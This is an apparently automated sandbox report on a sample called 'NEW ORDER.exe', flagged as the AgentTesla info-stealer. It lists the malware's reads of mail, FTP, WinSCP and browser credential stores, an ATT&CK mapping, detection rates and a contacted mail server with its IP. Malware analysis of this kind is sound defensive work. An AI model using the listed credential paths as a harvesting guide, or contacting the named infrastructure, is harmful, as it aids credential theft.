                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\NEW ORDER.exe VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.NEW ORDER.exe.376bf08.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER.exe.376bf08.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.698717283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.487669907.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.485892465.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.486525104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 7016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 3968, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara matchFile source: 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 3968, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.NEW ORDER.exe.376bf08.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.NEW ORDER.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER.exe.376bf08.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.505972636.000000000362F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.698717283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.487669907.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.485892465.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.486525104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 7016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NEW ORDER.exe PID: 3968, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		2
                    OS Credential Dumping                    		311
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job                    		Boot or Logon Initialization Scripts1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		1
                    Credentials in Registry                    		1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		Exfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion                    		Security Account Manager131
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares2
                    Data from Local System                    		Automated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer11
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                    Software Packing                    		DCSync114
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    NEW ORDER.exe38%VirustotalBrowse
                    NEW ORDER.exe41%ReversingLabsWin32.Trojan.Injuke
                    NEW ORDER.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\IrUpgWwdRBJK.exe41%ReversingLabsWin32.Trojan.Injuke

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    3.0.NEW ORDER.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    3.0.NEW ORDER.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    3.0.NEW ORDER.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    3.2.NEW ORDER.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    3.0.NEW ORDER.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    3.0.NEW ORDER.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://mail.focuzauto.com0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.fontbureau.comessedm0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cnt-bz0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.founder.c0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.sajatypeworks.comuctT/0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.fonts.comic0%URL Reputationsafe
                    http://www.fontbureau.com%0%Avira URL Cloudsafe
                    http://www.fontbureau.comcom0%URL Reputationsafe
                    http://www.urwpp.de/0%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.fonts.comn0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    https://uLakVAQ46zx.org0%Avira URL Cloudsafe
                    http://www.fontbureau.comrsiv0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.krF0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.de0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fonts.comc0%URL Reputationsafe
                    http://nSfkEw.com0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.sandoll.co.krm0%Avira URL Cloudsafe
                    http://www.sandoll.co.kre0%URL Reputationsafe
                    http://www.fontbureau.comtoo_0%Avira URL Cloudsafe
                    http://www.tiro.comtn0%URL Reputationsafe
                    http://www.fontbureau.comd0%URL Reputationsafe
                    http://www.fontbureau.comasva0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn/0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.comm0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.sajatypeworks.coma-d0%URL Reputationsafe
                    http://www.fontbureau.commA0%Avira URL Cloudsafe
                    http://www.fontbureau.como0%URL Reputationsafe
                    http://www.fontbureau.comFf0%Avira URL Cloudsafe
                    http://www.fontbureau.comals0%URL Reputationsafe
                    http://www.tiro.comc0%URL Reputationsafe
                    http://www.founder.com.cn/cnu-e0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.focuzauto.com
                    		166.62.10.145
                    		truetrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1NEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://www.fontbureau.com/designersGNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://mail.focuzauto.comNEW ORDER.exe, 00000003.00000002.705613036.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/?NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comessedmNEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers?NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cnt-bzNEW ORDER.exe, 00000000.00000003.442016798.00000000055DD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439415514.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439273001.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439377058.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.439307136.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.cNEW ORDER.exe, 00000000.00000003.442354972.00000000055A4000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.goodfont.co.krNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comuctT/NEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438211868.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438422766.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438358460.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438304023.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438727968.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438654430.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438259990.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438397273.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sajatypeworks.comNEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438211868.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438422766.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438358460.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438304023.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438259990.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438397273.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comicNEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com%NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              http://www.fontbureau.comcomNEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.de/NEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiNEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comnNEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://uLakVAQ46zx.orgNEW ORDER.exe, 00000003.00000002.705598159.0000000002DD8000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comrsivNEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comNEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sandoll.co.krFNEW ORDER.exe, 00000000.00000003.440601923.00000000055A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deNEW ORDER.exe, 00000000.00000003.450299640.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNEW ORDER.exe, 00000000.00000002.491114236.0000000002611000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sakkal.comNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0NEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comNEW ORDER.exe, 00000000.00000002.510314363.00000000067F2000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000002.509460420.00000000055A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fonts.comcNEW ORDER.exe, 00000000.00000003.438584464.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438817122.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438727968.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438654430.00000000055BB000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.438617797.00000000055BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://nSfkEw.comNEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwNEW ORDER.exe, 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sandoll.co.krmNEW ORDER.exe, 00000000.00000003.440601923.00000000055A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sandoll.co.kreNEW ORDER.exe, 00000000.00000003.440601923.00000000055A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comtoo_NEW ORDER.exe, 00000000.00000003.449593906.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000000.00000003.449121587.00000000055A9000.00000004.00000800.00020000.00000000.sdmpfalse
